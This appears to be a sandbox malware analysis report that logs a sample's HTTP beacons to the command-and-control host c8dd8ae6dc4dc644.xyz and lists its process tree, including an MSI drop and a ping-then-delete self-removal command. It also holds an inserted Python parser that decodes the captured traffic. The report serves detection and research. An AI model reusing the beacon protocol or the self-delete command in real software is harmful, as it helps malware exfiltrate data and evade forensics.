    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:13.833859921 CET | 171 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 93
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:13.833919048 CET | 171 | OUT | Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWOvEmubxP0owziK8XcpXagDYHrPpq3nfgg~~
                                                                                                                                                                        Jan 30, 2021 14:31:17.383786917 CET172INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:17 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:19.318113089 CET172OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 93
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:19.318176031 CET173OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 47 73 6c 53 31 35 50 42 66 4f 47 67 61 74 37 33 53 59 39 59 41 69 75 78
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWGslS15PBfOGgat73SY9YAiux4yQ8Hc57g~~
                                                                                                                                                                        Jan 30, 2021 14:31:22.825290918 CET173INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:22 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49722 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:25.730926037 CET | 174 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:25.731009007 CET | 174 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 4d 5a 36 6e 5a 49 42 56 66 6f 7a 50 6e 47 57 6b 48 74 69 5f 47 77 7e
Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWMZ6nZIBVfozPnGWkHti_Gw~
Jan 30, 2021 14:31:30.286595106 CET | 204 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:37.934276104 CET | 348 | OUT | POST /info_old/e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 677
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:37.934351921 CET | 349 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 78 55 65 79 62 34 6c 79 52 51 46 5a 6d 64 72 32 38 6b 75 37 59 74 58 44 79 48 36 6b 79 48 6d 36 4b 30 37 61 6e 42 49 50 73 34 72 31 44 51 5a 50 78 5a 5f 51 47 44 73 64 57 35 6b 61 41 65 33 72 71 56 6f
Data Ascii: info=4u25ymXISBxUeyb4lyRQFZmdr28ku7YtXDyH6kyHm6K07anBIPs4r1DQZPxZ_QGDsdW5kaAe3rqVoUN_zktsMfMMroBE6ZMplWVMft1B3me4F2fB4xJX1R67496R9y6BmL10gffodcPxdDxo_QFs-qE8vb4jC_-KtUzcFJwC_cZqf9tely__95GCtRz5FUjN5mc5exXs-w3dWG92w12dKZeqEQ8RjD9jVvJ_0uVoEqU4CM
Jan 30, 2021 14:31:39.173599005 CET | 350 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 110
Jan 30, 2021 14:31:39.186463118 CET | 350 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:39.186546087 CET | 350 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 42 50 4c 71 57 67 30 45 63 6e 73 47 37 43 61 43 45 4d 57 70 69 49 7e
Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWBPLqWg0EcnsG7CaCEMWpiI~
Jan 30, 2021 14:31:43.455353975 CET | 439 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:43.785324097 CET | 440 | OUT | POST /info_old/g HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 1405
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:43.785418987 CET | 441 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 78 55 65 79 62 34 6c 79 52 51 46 5a 6d 64 72 32 38 6b 75 37 59 74 58 44 79 48 36 6b 79 48 6d 36 4b 30 37 61 6e 42 49 50 73 34 72 31 44 51 5a 50 78 5a 5f 51 47 44 73 64 57 35 6b 61 41 65 33 72 71 56 6f
Data Ascii: info=4u25ymXISBxUeyb4lyRQFZmdr28ku7YtXDyH6kyHm6K07anBIPs4r1DQZPxZ_QGDsdW5kaAe3rqVoUN_zktsMfMMroBE6ZMplWVMft1B3mcibQ9Dqsq1jtU7TrdzUetyIiQPesj0aUulBIzT4qNIJ86n_rG_ouFGkKPdj5t63f5dXn55MuttceZci78VkMOEnp3PnTFczHOEaBVc-EQucZsY-GVq6kk6ztBwVbIpsQbJ-X
Jan 30, 2021 14:31:45.013859987 CET | 526 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:45.142966032 CET | 527 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:45.143001080 CET | 527 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 53 75 55 63 39 4a 63 45 48 4e 72 7a 52 67 4a 70 6c 71 5a 6a 59 7e
Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWESuUc9JcEHNrzRgJplqZjY~
Jan 30, 2021 14:31:49.696033001 CET | 534 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:49.710333109 CET534OUTGET /info_old/r HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:50.896301031 CET542INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:50 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: c6mtnVXGhd10~0
                                                                                                                                                                        Jan 30, 2021 14:32:07.928347111 CET575OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:32:07.928493023 CET575OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 4b 2d 73 48 31 50 68 77 61 6f 5a 51 45 5f 44 50 35 7a 37 69 36 73 7e
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWK-sH1PhwaoZQE_DP5z7i6s~
                                                                                                                                                                        Jan 30, 2021 14:32:12.093523979 CET577INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:32:12 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49723 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:26.687041998 CET | 175 kB | OUT
POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:26.687155962 CET | 175 kB | OUT
Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 58 35 77 43 76 4d 59 4f 63 57 34 7e
Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWEIxhnVHXQfYX5wCvMYOcW4~
Jan 30, 2021 14:31:32.487735033 CET | 228 kB | IN
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n
Jan 30, 2021 14:31:33.553212881 CET | 228 kB | OUT
POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:33.553366899 CET | 228 kB | OUT
Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 56 2d 41 76 59 4b 69 61 4d 2d 30 7e
Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWEIxhnVHXQfYV-AvYKiaM-0~
Jan 30, 2021 14:31:38.112478018 CET | 349 kB | IN
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49739 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:32:18.439049006 CET | 3354 kB | OUT
GET /info_old/ddd HTTP/1.1
Host: C8DD8AE6DC4DC644.xyz
Accept: */*
Jan 30, 2021 14:32:20.674977064 CET | 5291 kB | IN
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:32:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\n4HAoZl5GFTc~\r\n0\r\n\r\n
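The three sessions above are the whole of the sample's HTTP traffic: four `POST /info_old/w` beacons with an 81-byte `info=` body, a `GET /info_old/r` and a `GET /info_old/ddd`, each answered with a chunked `200 OK`. The report's "Data Ascii" view strips the CR/LF bytes, so the chunk framing (`c\r\n...\r\n0\r\n\r\n`) is only visible in the hex. The following parser is an added example written for this page, not code from Joe Sandbox or from the sample: it takes the "Data Raw" hex dumps exactly as printed in the report, de-chunks the responses, checks each beacon body against its `Content-Length: 81`, and works out which part of the `info` value is constant across beacons. The only assumption it makes is that the trailing `~` is a terminator or padding substitute for an otherwise URL-safe-base64 alphabet; the report gives no decoder, so the value is not decoded.

```python
"""Parse the raw HTTP exchanges captured in the sandbox report (added example)."""
import re
from os.path import commonprefix
from urllib.parse import parse_qs

# Copied verbatim from the report's "Data Raw" lines: the four POST /info_old/w
# bodies (sessions 1 and 2), each sent with "Content-Length: 81".
BEACON_BODIES_HEX = [
    "69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 53 75 55 63 39 4a 63 45 48 4e 72 7a 52 67 4a 70 6c 71 5a 6a 59 7e",  # 14:31:45
    "69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 4b 2d 73 48 31 50 68 77 61 6f 5a 51 45 5f 44 50 35 7a 37 69 36 73 7e",  # 14:32:07
    "69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 58 35 77 43 76 4d 59 4f 63 57 34 7e",  # 14:31:26
    "69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 56 2d 41 76 59 4b 69 61 4d 2d 30 7e",  # 14:31:33
]

# The chunked response bodies, keyed by the request that produced them.
RESPONSE_BODIES_HEX = {
    "POST /info_old/w": "30 0d 0a 0d 0a",
    "GET /info_old/r": "63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a 30 0d 0a 0d 0a",
    "GET /info_old/ddd": "63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a 30 0d 0a 0d 0a",
}

# Assumption: the info value is URL-safe base64 characters closed by a '~'.
INFO_ALPHABET = re.compile(r"^[A-Za-z0-9_-]+~$")


def raw_to_bytes(hexdump: str) -> bytes:
    """Turn a space-separated "Data Raw" hex dump into bytes."""
    return bytes.fromhex(hexdump)


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coding body.

    Returns the de-chunked payload. Raises ValueError when the framing is
    malformed or cut off, which separates a genuinely empty body
    ("0\\r\\n\\r\\n") from a capture that simply stopped early.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size = int(raw[pos:eol].split(b";")[0].strip(), 16)  # ignore chunk-ext
        pos = eol + 2
        if size == 0:
            # last-chunk: no trailers in these captures, just the empty line
            if raw[pos:pos + 2] != b"\r\n":
                raise ValueError("missing final CRLF after last-chunk")
            return bytes(out)
        chunk = raw[pos:pos + size]
        if len(chunk) != size or raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def is_well_framed(raw: bytes) -> bool:
    """True if `raw` is a complete chunked body; False flags a cut-off capture."""
    try:
        decode_chunked(raw)
        return True
    except ValueError:
        return False


def parse_beacon(body: bytes, content_length: int = 81) -> str:
    """Validate one POST /info_old/w body and return its `info` value."""
    if len(body) != content_length:
        raise ValueError(f"body is {len(body)} bytes, Content-Length says {content_length}")
    fields = parse_qs(body.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    if set(fields) != {"info"} or len(fields["info"]) != 1:
        raise ValueError(f"unexpected form fields: {sorted(fields)}")
    info = fields["info"][0]
    if not INFO_ALPHABET.match(info):
        raise ValueError("info value outside the assumed alphabet")
    return info


def beacon_invariants(bodies_hex=BEACON_BODIES_HEX) -> dict:
    """Split every beacon into the part all of them share and the part that varies."""
    infos = [parse_beacon(raw_to_bytes(h)) for h in bodies_hex]
    fixed = commonprefix(infos)
    return {
        "count": len(infos),
        "fixed_prefix": fixed,
        "variable_suffixes": [i[len(fixed):] for i in infos],
    }


def decode_responses(responses_hex=RESPONSE_BODIES_HEX) -> dict:
    """De-chunk each server reply; an empty bytes value means the server sent nothing."""
    return {req: decode_chunked(raw_to_bytes(h)) for req, h in responses_hex.items()}


if __name__ == "__main__":
    inv = beacon_invariants()
    print(f"{inv['count']} beacons share a {len(inv['fixed_prefix'])}-char prefix: {inv['fixed_prefix']}")
    for suffix in inv["variable_suffixes"]:
        print("  varying tail:", suffix)
    for req, payload in decode_responses().items():
        print(f"{req:<18} -> {payload!r}")
```

Run as-is, it shows that the four beacons share their first 53 characters and differ only in a 23-character tail, that every `POST /info_old/w` was answered with an empty chunked body, and that the two `GET` requests each returned a 12-byte token. Note also that session 3's `GET /info_old/ddd` carries a different header profile from sessions 1 and 2 (no `User-Agent`, `Accept: */*`, the host name in upper case), which suggests, as an inference from the capture rather than a fact stated in the report, a second HTTP client code path inside the sample.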


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 14:31:06
Start date: 30/01/2021
Path: C:\Users\user\Desktop\fnhcdXEfus.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects a suspicious ping command execution in an executable, Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: low

General

Start time: 14:31:10
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase: 0x1c0000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:11
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Imagebase: 0x1c0000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:17
Start date: 30/01/2021
Path: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 35%, Metadefender
• Detection: 83%, ReversingLabs
Reputation: low

General

Start time: 14:31:18
Start date: 30/01/2021
Path: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: low

General

Start time: 14:31:23
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:31:23
Start date: 30/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
